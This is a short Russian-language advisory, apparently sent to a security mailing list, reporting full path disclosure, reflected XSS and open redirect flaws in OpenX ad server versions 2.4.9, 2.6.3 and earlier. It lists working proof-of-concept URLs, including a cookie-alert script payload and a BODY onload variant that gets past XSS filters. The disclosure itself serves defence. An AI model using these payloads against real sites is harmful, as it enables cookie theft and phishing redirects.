Vulnerabilities in OpenX

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure, Cross-Site Scripting и Redirector уязвимостях
в OpenX.

Full path disclosure:

http://site/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://site/openx/www/delivery/fc.php?MAX_type=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (обход XSS фильтров в версии 2.6.3):

http://site/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Redirector:

http://site/openx/www/delivery/ck.php?dest=http://site.com

Уязвимы OpenX v2.4.9, OpenX v2.6.3 и предыдущие версии (и все версии Openads). А к Redirector
уязвимы все версии системы - OpenX v2.8.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3107/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua